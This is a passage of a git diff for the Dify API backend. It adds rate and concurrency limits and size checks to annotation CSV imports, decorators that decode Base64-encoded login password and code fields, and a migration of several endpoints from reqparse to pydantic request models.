flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -257,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -272,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") @@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, 
"Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. 
" + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/app/workflow_trigger.py b/api/controllers/console/app/workflow_trigger.py index 5d16e4f979..9433b732e4 100644 --- a/api/controllers/console/app/workflow_trigger.py +++ b/api/controllers/console/app/workflow_trigger.py @@ -114,7 +114,7 @@ class AppTriggersApi(Resource): @console_ns.route("/apps//trigger-enable") class AppTriggerEnableApi(Resource): - @console_ns.expect(console_ns.models[ParserEnable.__name__], validate=True) + @console_ns.expect(console_ns.models[ParserEnable.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/auth/login.py b/api/controllers/console/auth/login.py index f486f4c313..772d98822e 100644 --- a/api/controllers/console/auth/login.py +++ b/api/controllers/console/auth/login.py @@ -22,7 +22,12 @@ from controllers.console.error import ( NotAllowedCreateWorkspace, WorkspacesLimitExceeded, ) -from controllers.console.wraps import email_password_login_enabled, setup_required +from controllers.console.wraps import ( + decrypt_code_field, + decrypt_password_field, + email_password_login_enabled, + setup_required, +) from events.tenant_event import tenant_was_created from libs.helper import EmailStr, extract_remote_ip from libs.login import current_account_with_tenant @@ -79,6 +84,7 @@ class LoginApi(Resource): @setup_required @email_password_login_enabled @console_ns.expect(console_ns.models[LoginPayload.__name__]) + @decrypt_password_field def post(self): """Authenticate user and login.""" args = LoginPayload.model_validate(console_ns.payload) @@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource): class EmailCodeLoginApi(Resource): @setup_required @console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__]) + @decrypt_code_field def 
post(self): args = EmailCodeLoginPayload.model_validate(console_ns.payload) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 01f268d94d..cd958bbb36 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -140,6 +140,18 @@ class DataSourceNotionListApi(Resource): credential_id = request.args.get("credential_id", default=None, type=str) if not credential_id: raise ValueError("Credential id is required.") + + # Get datasource_parameters from query string (optional, for GitHub and other datasources) + datasource_parameters_str = request.args.get("datasource_parameters", default=None, type=str) + datasource_parameters = {} + if datasource_parameters_str: + try: + datasource_parameters = json.loads(datasource_parameters_str) + if not isinstance(datasource_parameters, dict): + raise ValueError("datasource_parameters must be a JSON object.") + except json.JSONDecodeError: + raise ValueError("Invalid datasource_parameters JSON format.") + datasource_provider_service = DatasourceProviderService() credential = datasource_provider_service.get_datasource_credentials( tenant_id=current_tenant_id, @@ -187,7 +199,7 @@ class DataSourceNotionListApi(Resource): online_document_result: Generator[OnlineDocumentPagesMessage, None, None] = ( datasource_runtime.get_online_document_pages( user_id=current_user.id, - datasource_parameters={}, + datasource_parameters=datasource_parameters, provider_type=datasource_runtime.datasource_provider_type(), ) ) @@ -218,14 +230,14 @@ class DataSourceNotionListApi(Resource): @console_ns.route( - "/notion/workspaces//pages///preview", + "/notion/pages///preview", "/datasets/notion-indexing-estimate", ) class DataSourceNotionApi(Resource): @setup_required @login_required @account_initialization_required - def get(self, workspace_id, page_id, page_type): + def get(self, page_id, page_type): _, current_tenant_id = 
current_account_with_tenant() credential_id = request.args.get("credential_id", default=None, type=str) @@ -239,11 +251,10 @@ class DataSourceNotionApi(Resource): plugin_id="langgenius/notion_datasource", ) - workspace_id = str(workspace_id) page_id = str(page_id) extractor = NotionExtractor( - notion_workspace_id=workspace_id, + notion_workspace_id="", notion_obj_id=page_id, notion_page_type=page_type, notion_access_token=credential.get("integration_secret"), diff --git a/api/controllers/console/datasets/datasets.py b/api/controllers/console/datasets/datasets.py index 70b6e932e9..8ceb896d4f 100644 --- a/api/controllers/console/datasets/datasets.py +++ b/api/controllers/console/datasets/datasets.py @@ -146,7 +146,7 @@ class DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: dict[str, Any] | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None @@ -223,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.COUCHBASE, VectorType.OPENGAUSS, VectorType.OCEANBASE, + VectorType.SEEKDB, VectorType.TABLESTORE, VectorType.HUAWEI_CLOUD, VectorType.TENCENT, @@ -230,6 +231,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.CLICKZETTA, VectorType.BAIDU, VectorType.ALIBABACLOUD_MYSQL, + VectorType.IRIS, } semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]} diff --git a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py index 42387557d6..7caf5b52ed 100644 --- a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py +++ 
b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py @@ -26,7 +26,7 @@ console_ns.schema_model(Parser.__name__, Parser.model_json_schema(ref_template=D @console_ns.route("/rag/pipelines//workflows/published/datasource/nodes//preview") class DataSourceContentPreviewApi(Resource): - @console_ns.expect(console_ns.models[Parser.__name__], validate=True) + @console_ns.expect(console_ns.models[Parser.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py index debe8eed97..46d67f0581 100644 --- a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py +++ b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py @@ -4,7 +4,7 @@ from typing import Any, Literal, cast from uuid import UUID from flask import abort, request -from flask_restx import Resource, marshal_with # type: ignore +from flask_restx import Resource, marshal_with, reqparse # type: ignore from pydantic import BaseModel, Field from sqlalchemy.orm import Session from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -975,6 +975,11 @@ class RagPipelineRecommendedPluginApi(Resource): @login_required @account_initialization_required def get(self): + parser = reqparse.RequestParser() + parser.add_argument("type", type=str, location="args", required=False, default="all") + args = parser.parse_args() + type = args["type"] + rag_pipeline_service = RagPipelineService() - recommended_plugins = rag_pipeline_service.get_recommended_plugins() + recommended_plugins = rag_pipeline_service.get_recommended_plugins(type) return recommended_plugins diff --git a/api/controllers/console/explore/completion.py b/api/controllers/console/explore/completion.py index 5901eca915..a6e5b2822a 100644 --- a/api/controllers/console/explore/completion.py +++ 
b/api/controllers/console/explore/completion.py @@ -40,7 +40,7 @@ from .. import console_ns logger = logging.getLogger(__name__) -class CompletionMessagePayload(BaseModel): +class CompletionMessageExplorePayload(BaseModel): inputs: dict[str, Any] query: str = "" files: list[dict[str, Any]] | None = None @@ -71,7 +71,7 @@ class ChatMessagePayload(BaseModel): raise ValueError("must be a valid UUID") from exc -register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) +register_schema_models(console_ns, CompletionMessageExplorePayload, ChatMessagePayload) # define completion api for user @@ -80,13 +80,13 @@ register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) endpoint="installed_app_completion", ) class CompletionApi(InstalledAppResource): - @console_ns.expect(console_ns.models[CompletionMessagePayload.__name__]) + @console_ns.expect(console_ns.models[CompletionMessageExplorePayload.__name__]) def post(self, installed_app): app_model = installed_app.app if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - payload = CompletionMessagePayload.model_validate(console_ns.payload or {}) + payload = CompletionMessageExplorePayload.model_validate(console_ns.payload or {}) args = payload.model_dump(exclude_none=True) streaming = payload.response_mode == "streaming" diff --git a/api/controllers/console/tag/tags.py b/api/controllers/console/tag/tags.py index 17cfc3ff4b..e9fbb515e4 100644 --- a/api/controllers/console/tag/tags.py +++ b/api/controllers/console/tag/tags.py @@ -1,31 +1,40 @@ +from typing import Literal + from flask import request -from flask_restx import Resource, marshal_with, reqparse +from flask_restx import Resource, marshal_with +from pydantic import BaseModel, Field from werkzeug.exceptions import Forbidden +from controllers.common.schema import register_schema_models from controllers.console import console_ns from controllers.console.wraps import account_initialization_required, 
edit_permission_required, setup_required from fields.tag_fields import dataset_tag_fields from libs.login import current_account_with_tenant, login_required -from models.model import Tag from services.tag_service import TagService -def _validate_name(name): - if not name or len(name) < 1 or len(name) > 50: - raise ValueError("Name must be between 1 to 50 characters.") - return name +class TagBasePayload(BaseModel): + name: str = Field(description="Tag name", min_length=1, max_length=50) + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") -parser_tags = ( - reqparse.RequestParser() - .add_argument( - "name", - nullable=False, - required=True, - help="Name must be between 1 to 50 characters.", - type=_validate_name, - ) - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") +class TagBindingPayload(BaseModel): + tag_ids: list[str] = Field(description="Tag IDs to bind") + target_id: str = Field(description="Target ID to bind tags to") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +class TagBindingRemovePayload(BaseModel): + tag_id: str = Field(description="Tag ID to remove") + target_id: str = Field(description="Target ID to unbind tag from") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +register_schema_models( + console_ns, + TagBasePayload, + TagBindingPayload, + TagBindingRemovePayload, ) @@ -43,7 +52,7 @@ class TagListApi(Resource): return tags, 200 - @console_ns.expect(parser_tags) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -53,22 +62,17 @@ class TagListApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tags.parse_args() - tag = TagService.save_tags(args) + payload = 
TagBasePayload.model_validate(console_ns.payload or {}) + tag = TagService.save_tags(payload.model_dump()) response = {"id": tag.id, "name": tag.name, "type": tag.type, "binding_count": 0} return response, 200 -parser_tag_id = reqparse.RequestParser().add_argument( - "name", nullable=False, required=True, help="Name must be between 1 to 50 characters.", type=_validate_name -) - - @console_ns.route("/tags/") class TagUpdateDeleteApi(Resource): - @console_ns.expect(parser_tag_id) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -79,8 +83,8 @@ class TagUpdateDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tag_id.parse_args() - tag = TagService.update_tags(args, tag_id) + payload = TagBasePayload.model_validate(console_ns.payload or {}) + tag = TagService.update_tags(payload.model_dump(), tag_id) binding_count = TagService.get_tag_binding_count(tag_id) @@ -100,17 +104,9 @@ class TagUpdateDeleteApi(Resource): return 204 -parser_create = ( - reqparse.RequestParser() - .add_argument("tag_ids", type=list, nullable=False, required=True, location="json", help="Tag IDs is required.") - .add_argument("target_id", type=str, nullable=False, required=True, location="json", help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/create") class TagBindingCreateApi(Resource): - @console_ns.expect(parser_create) + @console_ns.expect(console_ns.models[TagBindingPayload.__name__]) @setup_required @login_required @account_initialization_required @@ -120,23 +116,15 @@ class TagBindingCreateApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_create.parse_args() - TagService.save_tag_binding(args) + payload = 
TagBindingPayload.model_validate(console_ns.payload or {}) + TagService.save_tag_binding(payload.model_dump()) return {"result": "success"}, 200 -parser_remove = ( - reqparse.RequestParser() - .add_argument("tag_id", type=str, nullable=False, required=True, help="Tag ID is required.") - .add_argument("target_id", type=str, nullable=False, required=True, help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/remove") class TagBindingDeleteApi(Resource): - @console_ns.expect(parser_remove) + @console_ns.expect(console_ns.models[TagBindingRemovePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -146,7 +134,7 @@ class TagBindingDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_remove.parse_args() - TagService.delete_tag_binding(args) + payload = TagBindingRemovePayload.model_validate(console_ns.payload or {}) + TagService.delete_tag_binding(payload.model_dump()) return {"result": "success"}, 200 diff --git a/api/controllers/console/workspace/models.py b/api/controllers/console/workspace/models.py index a5b45ef514..2def57ed7b 100644 --- a/api/controllers/console/workspace/models.py +++ b/api/controllers/console/workspace/models.py @@ -282,9 +282,10 @@ class ModelProviderModelCredentialApi(Resource): tenant_id=tenant_id, provider_name=provider ) else: - model_type = args.model_type + # Normalize model_type to the origin value stored in DB (e.g., "text-generation" for LLM) + normalized_model_type = args.model_type.to_origin_model_type() available_credentials = model_provider_service.provider_manager.get_provider_model_available_credentials( - tenant_id=tenant_id, provider_name=provider, model_type=model_type, model_name=args.model + tenant_id=tenant_id, provider_name=provider, model_type=normalized_model_type, 
model_name=args.model ) return jsonable_encoder( diff --git a/api/controllers/console/workspace/plugin.py b/api/controllers/console/workspace/plugin.py index c5624e0fc2..805058ba5a 100644 --- a/api/controllers/console/workspace/plugin.py +++ b/api/controllers/console/workspace/plugin.py @@ -46,8 +46,8 @@ class PluginDebuggingKeyApi(Resource): class ParserList(BaseModel): - page: int = Field(default=1) - page_size: int = Field(default=256) + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") reg(ParserList) @@ -106,8 +106,8 @@ class ParserPluginIdentifierQuery(BaseModel): class ParserTasks(BaseModel): - page: int - page_size: int + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") class ParserMarketplaceUpgrade(BaseModel): diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..95fc006a12 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar from flask import abort, request from configs import dify_config +from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError from controllers.console.workspace.error import AccountNotInitializedError from enums.cloud_plan import CloudPlan from extensions.ext_database import db from extensions.ext_redis import redis_client +from libs.encryption import FieldEncryption from libs.login import current_account_with_tenant from models.account import AccountStatus from models.dataset import RateLimitLog @@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo P = ParamSpec("P") R = TypeVar("R") +# Field names for decryption +FIELD_NAME_PASSWORD = "password" +FIELD_NAME_CODE = "code" + +# Error messages for decryption failures 
+ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data" +ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code" + def account_initialization_required(view: Callable[P, R]): @wraps(view) @@ -331,3 +341,163 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. 
Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated + + +def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None: + """ + Helper to decode a Base64 encoded field in the request payload. 
+ + Args: + field_name: Name of the field to decode + error_class: Exception class to raise on decoding failure + error_message: Error message to include in the exception + """ + if not request or not request.is_json: + return + # Get the payload dict - it's cached and mutable + payload = request.get_json() + if not payload or field_name not in payload: + return + encoded_value = payload[field_name] + decoded_value = FieldEncryption.decrypt_field(encoded_value) + + # If decoding failed, raise error immediately + if decoded_value is None: + raise error_class(error_message) + + # Update payload dict in-place with decoded value + # Since payload is a mutable dict and get_json() returns the cached reference, + # modifying it will affect all subsequent accesses including console_ns.payload + payload[field_name] = decoded_value + + +def decrypt_password_field(view: Callable[P, R]): + """ + Decorator to decrypt password field in request payload. + + Automatically decrypts the 'password' field if encryption is enabled. + If decryption fails, raises AuthenticationFailedError. + + Usage: + @decrypt_password_field + def post(self): + args = LoginPayload.model_validate(console_ns.payload) + # args.password is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA) + return view(*args, **kwargs) + + return decorated + + +def decrypt_code_field(view: Callable[P, R]): + """ + Decorator to decrypt verification code field in request payload. + + Automatically decrypts the 'code' field if encryption is enabled. + If decryption fails, raises EmailCodeError. 
+ + Usage: + @decrypt_code_field + def post(self): + args = EmailCodeLoginPayload.model_validate(console_ns.payload) + # args.code is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE) + return view(*args, **kwargs) + + return decorated diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index b7fb01c6fe..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel): @classmethod def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + if not value: return None diff --git a/api/controllers/service_api/dataset/dataset.py b/api/controllers/service_api/dataset/dataset.py index 7692aeed23..4f91f40c55 100644 --- a/api/controllers/service_api/dataset/dataset.py +++ b/api/controllers/service_api/dataset/dataset.py @@ -49,7 +49,7 @@ class DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: RetrievalModel | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None diff --git a/api/controllers/trigger/trigger.py b/api/controllers/trigger/trigger.py index e69b22d880..c10b94050c 100644 --- a/api/controllers/trigger/trigger.py +++ b/api/controllers/trigger/trigger.py @@ -33,7 +33,7 @@ def trigger_endpoint(endpoint_id: str): if response: break if not response: - logger.error("Endpoint not found for {endpoint_id}") + logger.info("Endpoint not found for %s", endpoint_id) 
return jsonify({"error": "Endpoint not found"}), 404 return response except ValueError as e: diff --git a/api/controllers/web/audio.py b/api/controllers/web/audio.py index b9fef48c4d..15828cc208 100644 --- a/api/controllers/web/audio.py +++ b/api/controllers/web/audio.py @@ -1,7 +1,8 @@ import logging from flask import request -from flask_restx import fields, marshal_with, reqparse +from flask_restx import fields, marshal_with +from pydantic import BaseModel, field_validator from werkzeug.exceptions import InternalServerError import services @@ -20,6 +21,7 @@ from controllers.web.error import ( from controllers.web.wraps import WebApiResource from core.errors.error import ModelCurrentlyNotSupportError, ProviderTokenNotInitError, QuotaExceededError from core.model_runtime.errors.invoke import InvokeError +from libs.helper import uuid_value from models.model import App from services.audio_service import AudioService from services.errors.audio import ( @@ -29,6 +31,25 @@ from services.errors.audio import ( UnsupportedAudioTypeServiceError, ) +from ..common.schema import register_schema_models + + +class TextToAudioPayload(BaseModel): + message_id: str | None = None + voice: str | None = None + text: str | None = None + streaming: bool | None = None + + @field_validator("message_id") + @classmethod + def validate_message_id(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, TextToAudioPayload) + logger = logging.getLogger(__name__) @@ -88,6 +109,7 @@ class AudioApi(WebApiResource): @web_ns.route("/text-to-audio") class TextApi(WebApiResource): + @web_ns.expect(web_ns.models[TextToAudioPayload.__name__]) @web_ns.doc("Text to Audio") @web_ns.doc(description="Convert text to audio using text-to-speech service.") @web_ns.doc( @@ -102,18 +124,11 @@ class TextApi(WebApiResource): def post(self, app_model: App, end_user): """Convert text to audio""" try: - parser = ( - 
reqparse.RequestParser() - .add_argument("message_id", type=str, required=False, location="json") - .add_argument("voice", type=str, location="json") - .add_argument("text", type=str, location="json") - .add_argument("streaming", type=bool, location="json") - ) - args = parser.parse_args() + payload = TextToAudioPayload.model_validate(web_ns.payload or {}) - message_id = args.get("message_id", None) - text = args.get("text", None) - voice = args.get("voice", None) + message_id = payload.message_id + text = payload.text + voice = payload.voice response = AudioService.transcript_tts( app_model=app_model, text=text, voice=voice, end_user=end_user.external_user_id, message_id=message_id ) diff --git a/api/controllers/web/completion.py b/api/controllers/web/completion.py index e8a4698375..a97d745471 100644 --- a/api/controllers/web/completion.py +++ b/api/controllers/web/completion.py @@ -1,9 +1,11 @@ import logging +from typing import Any, Literal -from flask_restx import reqparse +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import InternalServerError, NotFound import services +from controllers.common.schema import register_schema_models from controllers.web import web_ns from controllers.web.error import ( AppUnavailableError, @@ -34,25 +36,44 @@ from services.errors.llm import InvokeRateLimitError logger = logging.getLogger(__name__) +class CompletionMessagePayload(BaseModel): + inputs: dict[str, Any] = Field(description="Input variables for the completion") + query: str = Field(default="", description="Query text for completion") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + retriever_from: str = Field(default="web_app", description="Source of retriever") + + +class ChatMessagePayload(BaseModel): + inputs: dict[str, Any] = 
Field(description="Input variables for the chat") + query: str = Field(description="User query/message") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + conversation_id: str | None = Field(default=None, description="Conversation ID") + parent_message_id: str | None = Field(default=None, description="Parent message ID") + retriever_from: str = Field(default="web_app", description="Source of retriever") + + @field_validator("conversation_id", "parent_message_id") + @classmethod + def validate_uuid(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, CompletionMessagePayload, ChatMessagePayload) + + # define completion api for user @web_ns.route("/completion-messages") class CompletionApi(WebApiResource): @web_ns.doc("Create Completion Message") @web_ns.doc(description="Create a completion message for text generation applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the completion", "type": "object", "required": True}, - "query": {"description": "Query text for completion", "type": "string", "required": False}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[CompletionMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -67,18 +88,10 @@ class CompletionApi(WebApiResource): if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", 
type=dict, required=True, location="json") - .add_argument("query", type=str, location="json", default="") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("retriever_from", type=str, required=False, default="web_app", location="json") - ) + payload = CompletionMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: @@ -142,22 +155,7 @@ class CompletionStopApi(WebApiResource): class ChatApi(WebApiResource): @web_ns.doc("Create Chat Message") @web_ns.doc(description="Create a chat message for conversational applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the chat", "type": "object", "required": True}, - "query": {"description": "User query/message", "type": "string", "required": True}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "conversation_id": {"description": "Conversation UUID", "type": "string", "required": False}, - "parent_message_id": {"description": "Parent message UUID", "type": "string", "required": False}, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[ChatMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -173,20 +171,10 @@ class ChatApi(WebApiResource): if app_mode not in {AppMode.CHAT, AppMode.AGENT_CHAT, AppMode.ADVANCED_CHAT}: raise NotChatAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", type=dict, required=True, 
